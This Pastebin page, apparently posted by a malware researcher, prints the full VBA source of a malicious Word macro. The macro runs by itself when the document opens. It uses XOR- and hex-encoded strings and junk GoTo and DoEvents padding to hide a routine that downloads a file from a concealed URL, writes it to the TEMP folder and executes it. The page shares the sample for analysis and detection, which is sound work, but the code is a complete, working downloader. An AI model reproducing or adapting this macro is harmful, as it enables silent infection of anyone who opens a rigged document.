API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Dec 12th, 2014
586
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 11.58 KB | None | 0 0
raw download clone embed print report
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Public Function XORI(ByVal xicjMaZpt As String, ByVal nMcTEmoJm As String) As String
  10. Dim EOjxkQxT As Long
  11. For EOjxkQxT = 1 To Len(xicjMaZpt)
  12.  
  13. Dim QctTVICL As Integer
  14. Dim cFPFIYBU As Integer
  15. For cFPFIYBU = 0 To 6
  16. DoEvents
  17. Next cFPFIYBU
  18. QctTVICL = 7
  19. Do While QctTVICL < 28
  20. Dim StdTGllU As Integer
  21. For StdTGllU = 0 To 9
  22. DoEvents
  23. Next StdTGllU
  24. DoEvents: QctTVICL = QctTVICL + 1
  25. Dim xMqFiUle As Integer
  26. For xMqFiUle = 0 To 3
  27. DoEvents
  28. Next xMqFiUle
  29. Loop
  30.  
  31. Dim QqSTgmDe As Integer
  32. For QqSTgmDe = 0 To 5
  33. DoEvents
  34. Next QqSTgmDe
  35. XORI = XORI & Chr(Asc(Mid(nMcTEmoJm, IIf(EOjxkQxT Mod Len(nMcTEmoJm) <> 0, EOjxkQxT Mod Len(nMcTEmoJm), Len(nMcTEmoJm)), 1)) Xor Asc(Mid(xicjMaZpt, EOjxkQxT, 1)))
  36. Next EOjxkQxT
  37. End Function
  38. Public Function Hextostring(ByVal cJbMQrQcVo As String) As String
  39. Dim IeCvrCT As String
  40. Dim DrBZTx As String
  41. Dim fzEMCirrqv As Long
  42. For fzEMCirrqv = 1 To Len(cJbMQrQcVo) Step 2
  43.  
  44. Dim RhqhLzTZ As Integer
  45. Dim muelWLmV As Integer
  46. For muelWLmV = 0 To 9
  47. DoEvents
  48. Next muelWLmV
  49. RhqhLzTZ = 4
  50. Do While RhqhLzTZ < 97
  51. Dim qfCHorOw As Integer
  52. For qfCHorOw = 0 To 1
  53. DoEvents
  54. Next qfCHorOw
  55. DoEvents: RhqhLzTZ = RhqhLzTZ + 1
  56. Dim BRaAsjQK As Integer
  57. For BRaAsjQK = 0 To 2
  58. DoEvents
  59. Next BRaAsjQK
  60. Loop
  61.  
  62. Dim GQWNnAah As Integer
  63. For GQWNnAah = 0 To 9
  64. DoEvents
  65. Next GQWNnAah
  66. IeCvrCT = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(cJbMQrQcVo, fzEMCirrqv, 2)))
  67.  
  68. Dim AUPhkyFG As Integer
  69. Dim TVkstGBa As Integer
  70. For TVkstGBa = 0 To 4
  71. DoEvents
  72. Next TVkstGBa
  73. AUPhkyFG = 6
  74. Do While AUPhkyFG < 53
  75. Dim HIpHCYEy As Integer
  76. For HIpHCYEy = 0 To 6
  77. DoEvents
  78. Next HIpHCYEy
  79. DoEvents: AUPhkyFG = AUPhkyFG + 1
  80. Dim XNutKALo As Integer
  81. For XNutKALo = 0 To 4
  82. DoEvents
  83. Next XNutKALo
  84. Loop
  85.  
  86. Dim vSKdZNQW As Integer
  87. For vSKdZNQW = 0 To 9
  88. DoEvents
  89. Next vSKdZNQW
  90. DrBZTx = DrBZTx & IeCvrCT
  91. Next fzEMCirrqv
  92.  
  93. Dim giWnjmfl As Integer
  94. Dim wBGkwCdq As Integer
  95. For wBGkwCdq = 0 To 6
  96. DoEvents
  97. Next wBGkwCdq
  98. giWnjmfl = 1
  99. Do While giWnjmfl < 14
  100. Dim FJcQsIId As Integer
  101. For FJcQsIId = 0 To 9
  102. DoEvents
  103. Next FJcQsIId
  104. DoEvents: giWnjmfl = giWnjmfl + 1
  105. Dim MolNiEVg As Integer
  106. For MolNiEVg = 0 To 7
  107. DoEvents
  108. Next MolNiEVg
  109. Loop
  110.  
  111. Dim yLsRBlZm As Integer
  112. For yLsRBlZm = 0 To 9
  113. DoEvents
  114. Next yLsRBlZm
  115. Hextostring = DrBZTx
  116. End Function
  117.  
  118.  
  119. Sub Auto_Open()
  120. GoTo ruasvvfhdwnyfwvlyfvgzypqhlekgukmiiwqldehkfvillpnmacqzbvelbbelgjnjtrnwxumtmyukdhajyahmxun:
  121. ruasvvfhdwnyfwvlyfvgzypqhlekgukmiiwqldehkfvillpnmacqzbvelbbelgjnjtrnwxumtmyukdhajyahmxun:
  122. GoTo ujhlspviumyqspsnpkgjcpopcahbdbubpeqcpjwqwcgxdschcazspjqugvdfpgoatoiffvfxjxcqcylpyftitwte:
  123. ujhlspviumyqspsnpkgjcpopcahbdbubpeqcpjwqwcgxdschcazspjqugvdfpgoatoiffvfxjxcqcylpyftitwte:
  124. GoTo aqynxlaxpejjbqwicohawxriwtthajvyxqqvvoqtgjlxjireadncagbxorhrfbsccvsrscrhmkvdeourvcszwevi:
  125. aqynxlaxpejjbqwicohawxriwtthajvyxqqvvoqtgjlxjireadncagbxorhrfbsccvsrscrhmkvdeourvcszwevi:
  126. GDABRYXEKTS
  127. End Sub
  128. Sub AutoOpen()
  129. GoTo yyccrzpgxbfwprorphpzmwkoyffolpcrrxwtaggibqynvnrgdyndpbifodaqmhicshyzkxjrmswlicexsrxbjhvh:
  130. yyccrzpgxbfwprorphpzmwkoyffolpcrrxwtaggibqynvnrgdyndpbifodaqmhicshyzkxjrmswlicexsrxbjhvh:
  131. GoTo ojafiiwikrzjoxvdcwavsykagcbkjmfwtuqmwqfzmsvsiourbuvxokfktshdqhsbllznavxkpvodfjyeqsklxczp:
  132. ojafiiwikrzjoxvdcwavsykagcbkjmfwtuqmwqfzmsvsiourbuvxokfktshdqhsbllznavxkpvodfjyeqsklxczp:
  133. GoTo dlqpwhyxwnefrwhcnxsiiidnzkhugqwsitqayzdbzrasxkjpfosymgorsolexnwpiyfkncgpeqpczqchopcepvdv:
  134. dlqpwhyxwnefrwhcnxsiiidnzkhugqwsitqayzdbzrasxkjpfosymgorsolexnwpiyfkncgpeqpczqchopcepvdv:
  135.     Auto_Open
  136. End Sub
  137. Sub Workbook_Open()
  138. GoTo iyiudojgrwlkltrockyqgjbnbbxsrxqnlnwopjbarujhwujehfsvonwcakflikapvvoyfxbmrfkdmtotvqyuyidr:
  139. iyiudojgrwlkltrockyqgjbnbbxsrxqnlnwopjbarujhwujehfsvonwcakflikapvvoyfxbmrfkdmtotvqyuyidr:
  140. GoTo xjcbjynummnfjcoknrvrjwvktuyoedovqzqddecgukylhlqpagmyiknmvjqaajexfaczvvecgntvrmxhgnsadjmn:
  141. xjcbjynummnfjcoknrvrjwvktuyoedovqzqddecgukylhlqpagmyiknmvjqaajexfaczvvecgntvrmxhgnsadjmn:
  142. GoTo glgrafdzdeiadraasvbjcrojddvmlentroqfjcclqppqlbanjhglngrgwvewemxurhhdxcchbeuudsdmriufmklf:
  143. glgrafdzdeiadraasvbjcrojddvmlentroqfjcclqppqlbanjhglngrgwvewemxurhhdxcchbeuudsdmriufmklf:
  144.     Auto_Open
  145. End Sub
  146. Function VYXQPXIETSZ(ByVal KWIDOJJHRJD As String, ByVal ZPKYKPAZRNC As String) As Boolean
  147.      Dim UICEAIAVFZZ As Object, YKGKMJIBROC As Long, SYHFRMSETBM As Long, HCABKIAGVDD() As Byte
  148.  
  149. GoTo ujhlspviumyqspsnpkgjcpopcahbdbubpeqcpjwqwcgxdschcazspjqugvdfpgoatoiffvfxjxcqcylpyftitwte:
  150. ujhlspviumyqspsnpkgjcpopcahbdbubpeqcpjwqwcgxdschcazspjqugvdfpgoatoiffvfxjxcqcylpyftitwte:
  151. GoTo aqynxlaxpejjbqwicohawxriwtthajvyxqqvvoqtgjlxjireadncagbxorhrfbsccvsrscrhmkvdeourvcszwevi:
  152. aqynxlaxpejjbqwicohawxriwtthajvyxqqvvoqtgjlxjireadncagbxorhrfbsccvsrscrhmkvdeourvcszwevi:
  153. GoTo webyybgnxnmfpmzlndhxmvkummctbifjbkwbmsqonirxqjfphgfuksemhdkvyiwigsecmcvuoxncsxbjgtuvkrhc:
  154. webyybgnxnmfpmzlndhxmvkummctbifjbkwbmsqonirxqjfphgfuksemhdkvyiwigsecmcvuoxncsxbjgtuvkrhc:
  155.     Set UICEAIAVFZZ = CreateObject(XORI(Hextostring("2B07372B185D480C222A1C3B3204"), Hextostring("66546F")))
  156. GoTo ctjfktlfbeoatidssrjyyndyurfcxmwbmjwnfelcpsixtcxnejklummgzpwhnqzerjcgvxjawkmuobgatgfagrym:
  157. ctjfktlfbeoatidssrjyyndyurfcxmwbmjwnfelcpsixtcxnejklummgzpwhnqzerjcgvxjawkmuobgatgfagrym:
  158. GoTo nheerqsywmkvenkohiyoidsvhgbezkzcsslqtikmcznbkybhjkjsylrquiunllgtzwmwivxcfdjqgqkpxziwpder:
  159. nheerqsywmkvenkohiyoidsvhgbezkzcsslqtikmcznbkybhjkjsylrquiunllgtzwmwivxcfdjqgqkpxziwpder:
  160. GoTo qkxahmhprrazkyiqlsuehgvcxohziiargmqwiajfugdbegyerqwxvhaydjpkzsyqduwptcfjcykdxrurdegyufxo:
  161. qkxahmhprrazkyiqlsuehgvcxohziiargmqwiajfugdbegyerqwxvhaydjpkzsyqduwptcfjcykdxrurdegyufxo:
  162.     UICEAIAVFZZ.Open XORI(Hextostring("122F20"), Hextostring("556A74")), KWIDOJJHRJD, False
  163. GoTo zwfimyqvunpidhmdeeihcjoxqftstmkfjbqezwhkqyjbuzhpoeuyffyzivcigxbgwxxsectoyslcwuvjedporgfv:
  164. zwfimyqvunpidhmdeeihcjoxqftstmkfjbqezwhkqyjbuzhpoeuyffyzivcigxbgwxxsectoyslcwuvjedporgfv:
  165. GoTo frrjpgtapewtbclxycomwlrpnicqelycqcwrbxhefnwnpqcnbrxlwadnfrbaytkmzmgwqcvskyquapfazxjxqgra:
  166. frrjpgtapewtbclxycomwlrpnicqelycqcwrbxhefnwnpqcnbrxlwadnfrbaytkmzmgwqcvskyquapfazxjxqgra:
  167. GoTo yyccrzpgxbfwprorphpzmwkoyffolpcrrxwtaggibqynvnrgdyndpbifodaqmhicshyzkxjrmswlicexsrxbjhvh:
  168. yyccrzpgxbfwprorphpzmwkoyffolpcrrxwtaggibqynvnrgdyndpbifodaqmhicshyzkxjrmswlicexsrxbjhvh:
  169.     UICEAIAVFZZ.Send XORI(Hextostring("152D2404270A0924"), Hextostring("634F42"))
  170. GoTo ojafiiwikrzjoxvdcwavsykagcbkjmfwtuqmwqfzmsvsiourbuvxokfktshdqhsbllznavxkpvodfjyeqsklxczp:
  171. ojafiiwikrzjoxvdcwavsykagcbkjmfwtuqmwqfzmsvsiourbuvxokfktshdqhsbllznavxkpvodfjyeqsklxczp:
  172. GoTo dlqpwhyxwnefrwhcnxsiiidnzkhugqwsitqayzdbzrasxkjpfosymgorsolexnwpiyfkncgpeqpczqchopcepvdv:
  173. dlqpwhyxwnefrwhcnxsiiidnzkhugqwsitqayzdbzrasxkjpfosymgorsolexnwpiyfkncgpeqpczqchopcepvdv:
  174. GoTo replfcpnregaksytsgdwhpvblxrbspopzewsofsdyvgsnvbnlzjljdhoykexhoxtmzticctffvxuqrfmmwqyubes:
  175. replfcpnregaksytsgdwhpvblxrbspopzewsofsdyvgsnvbnlzjljdhoykexhoxtmzticctffvxuqrfmmwqyubes:
  176.     HCABKIAGVDD = UICEAIAVFZZ.responseBody
  177.  
  178. GoTo cqnwurbckebtojxjytrcadkspngeodcidsqurrnpnxnhfwnnxmpldflemdnucckshrvvlcggafguzkdmjarqxuqd:
  179. cqnwurbckebtojxjytrcadkspngeodcidsqurrnpnxnhfwnnxmpldflemdnucckshrvvlcggafguzkdmjarqxuqd:
  180. GoTo jrkalddawnuwtbfmpbtuugdakwrzuedkhmwiuvbvpgdhkmuhasbdqavitosnhyivyojhhcyuzihlqwwzyparouzk:
  181. jrkalddawnuwtbfmpbtuugdakwrzuedkhmwiuvbvpgdhkmuhasbdqavitosnhyivyojhhcyuzihlqwwzyparouzk:
  182. GoTo iyiudojgrwlkltrockyqgjbnbbxsrxqnlnwopjbarujhwujehfsvonwcakflikapvvoyfxbmrfkdmtotvqyuyidr:
  183. iyiudojgrwlkltrockyqgjbnbbxsrxqnlnwopjbarujhwujehfsvonwcakflikapvvoyfxbmrfkdmtotvqyuyidr:
  184.     SYHFRMSETBM = FreeFile
  185.  
  186.     Open ZPKYKPAZRNC For Binary As #SYHFRMSETBM
  187.     Put #SYHFRMSETBM, , HCABKIAGVDD
  188.     Close #SYHFRMSETBM
  189. GoTo sroedjmsmnjolxtuezcwgrbwicfmkjaltowqhprstppigpdoxnouraljxkxsbrbdbldurchyxrtcoabjnbrdszjx:
  190. sroedjmsmnjolxtuezcwgrbwicfmkjaltowqhprstppigpdoxnouraljxkxsbrbdbldurchyxrtcoabjnbrdszjx:
  191. GoTo ruasvvfhdwnyfwvlyfvgzypqhlekgukmiiwqldehkfvillpnmacqzbvelbbelgjnjtrnwxumtmyukdhajyahmxun:
  192. ruasvvfhdwnyfwvlyfvgzypqhlekgukmiiwqldehkfvillpnmacqzbvelbbelgjnjtrnwxumtmyukdhajyahmxun:
  193. GoTo lvaarmwbaarlhwvcpseulxvdcjohfcogolkjmswlpfqbzgkjemtmepqurhhriepjruwambkhjdsqpbfitarbfasp:
  194. lvaarmwbaarlhwvcpseulxvdcjohfcogolkjmswlpfqbzgkjemtmepqurhhriepjruwambkhjdsqpbfitarbfasp:
  195.    
  196. GoTo znqihuysdtghaahycrrqbvisezmtshnczkkkdeqrrytbvxnrisozpibxaxkvsgddxxxqvbounudflaewcpaasswb:
  197. znqihuysdtghaahycrrqbvisezmtshnczkkkdeqrrytbvxnrisozpibxaxkvsgddxxxqvbounudflaewcpaasswb:
  198. GoTo fspjmgpjhavdcoyjnvtfrnemahkcnyhrvhlljclijnobaquzcfvtmtemtwwhrbebfahpxvsaodfvnfpggqygnszd:
  199. fspjmgpjhavdcoyjnvtfrnemahkcnyhrvhlljclijnobaquzcfvtmtemtwwhrbebfahpxvsaodfvnfpggqygnszd:
  200. GoTo yfscpxbwkrumiknndjybsajnupufcbrgmflqqhkxaqcbgmjmshskkwngsatybicpehuspvwewuguyjanrsdkcddk:
  201. yfscpxbwkrumiknndjybsajnupufcbrgmflqqhkxaqcbgmjmshskkwngsatybicpehuspvwewuguyjanrsdkcddk:
  202. Set GBIviviu67FUGBK = CreateObject(XORI(Hextostring("29240416204F3B3C111625021B38081522"), Hextostring("7A4C61")))
  203. GoTo ocjfbiuccshcuudyhwvafgjkhwqzxhxsanjxzwjnfsfanpqjvjmmjxrlbmpkjujxpqzkebnjfqeqspfiziuoqpmz:
  204. ocjfbiuccshcuudyhwvafgjkhwqzxhxsanjxzwjnfsfanpqjvjmmjxrlbmpkjujxpqzkebnjfqeqspfiziuoqpmz:
  205. GoTo dbupijzmbtbpwjeklcbxpjshcbosoyszfvkcbxjdbrkadkatdkgzyoateucioluiayfuqblocvrfocwwdlfcjzln:
  206. dbupijzmbtbpwjeklcbxpjshcbosoyszfvkcbxjdbrkadkatdkgzyoateucioluiayfuqblocvrfocwwdlfcjzln:
  207. GoTo rmnlwcbfaaiuhvxmehbyklvgwqmqyblwjckvaghjoveahbozkqlrcuypnhbadsmeqzynkbosyqyvknpgwmonfzof:
  208. rmnlwcbfaaiuhvxmehbyklvgwqmqyblwjckvaghjoveahbozkqlrcuypnhbadsmeqzynkbosyqyvknpgwmonfzof:
  209. GBIviviu67FUGBK.Open Environ(XORI(Hextostring("391F2913"), Hextostring("6D5A6443716F69"))) & XORI(Hextostring("2406210B022E063F0B173F0C5F2A2D1D"), Hextostring("7854714F55"))
  210. GoTo bdkbfedkdtlratgpuunlvwofmvkorkuslzlbfygeejusqrkmtetjfrdbrcaqtxljonnkgvsrkvuubsmnpohsaxsl:
  211. bdkbfedkdtlratgpuunlvwofmvkorkuslzlbfygeejusqrkmtetjfrdbrcaqtxljonnkgvsrkvuubsmnpohsaxsl:
  212. GoTo kgitbajehmaqvftwpmmderrsylumqivpeolnkmfuhopstdnhptpawqidmefpnrosaflidvebmqiqtfkosqzhbcwt:
  213. kgitbajehmaqvftwpmmderrsylumqivpeolnkmfuhopstdnhptpawqidmefpnrosaflidvebmqiqtfkosqzhbcwt:
  214. GoTo evcxsbnbptihxeoacgkhtiewgaluknhitrkqofdplqsgkcsttyipqzfjcwlekrdfkkrccbmppgbfsuwqlbjueekm:
  215. evcxsbnbptihxeoacgkhtiewgaluknhitrkqofdplqsgkcsttyipqzfjcwlekrdfkkrccbmppgbfsuwqlbjueekm:
  216.      
  217. End Function
  218. Sub GDABRYXEKTS()
  219. GoTo msdozqikxatqiymvpoxndjjwlinsiqfygblavobcsrklbfsjiaiasrvucaflgcpfriadsvpmzneqjzhotumzlhku:
  220. msdozqikxatqiymvpoxndjjwlinsiqfygblavobcsrklbfsjiaiasrvucaflgcpfriadsvpmzneqjzhotumzlhku:
  221. GoTo qgektnxebrhjehlucdcpolsqbfjqtpwhkclsmsvmcbelspprcdcxqwwxqijouysncceemvdwrerdvvtevjtbhjiz:
  222. qgektnxebrhjehlucdcpolsqbfjqtpwhkclsmsvmcbelspprcdcxqwwxqijouysncceemvdwrerdvvtevjtbhjiz:
  223. GoTo tciyoctvwscdwtrhnjfxzrsptcameapflijtqjcfnuzececzidzrlzbnhuewntradmuopbihgjzvwkiffcakzvtj:
  224. tciyoctvwscdwtrhnjfxzrsptcameapflijtqjcfnuzececzidzrlzbnhuewntradmuopbihgjzvwkiffcakzvtj:
  225. VBkjbnlkBK = XORI(Hextostring("0515011C574E5A060300111A081301051E081B0B43021A01420B06430F081B42081910"), Hextostring("6D61756C"))
  226. GoTo bnmgewoattymhfcbdigylyvifllkqqmxeykyrixkpabrmarmvgnjiiefphyzqjcvwgmmibmibpxiawbbetyeibve:
  227. bnmgewoattymhfcbdigylyvifllkqqmxeykyrixkpabrmarmvgnjiiefphyzqjcvwgmmibmibpxiawbbetyeibve:
  228. GoTo lalxgacguajvaxgihahlbioupxiujzjeytkuiaxerwsrfifjsjdabymljcodxmhozqqltbqsihcqithoxgfytbhi:
  229. lalxgacguajvaxgihahlbioupxiujzjeytkuiaxerwsrfifjsjdabymljcodxmhozqqltbqsihcqithoxgfytbhi:
  230. GoTo pdoqnumlprnzcwyllejdrprtkknbgdtdielizwzijchrjhxrklkxhettzezrhpyrsyxoevzelpbdjiredvoownyx:
  231. pdoqnumlprnzcwyllejdrprtkknbgdtdielizwzijchrjhxrklkxhettzezrhpyrsyxoevzelpbdjiredvoownyx:
  232.     VYXQPXIETSZ VBkjbnlkBK, Environ(XORI(Hextostring("1D1C3F19"), Hextostring("495972"))) & XORI(Hextostring("39081E31141237140A37041C4B3F3610"), Hextostring("655A4E754344"))
  233. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!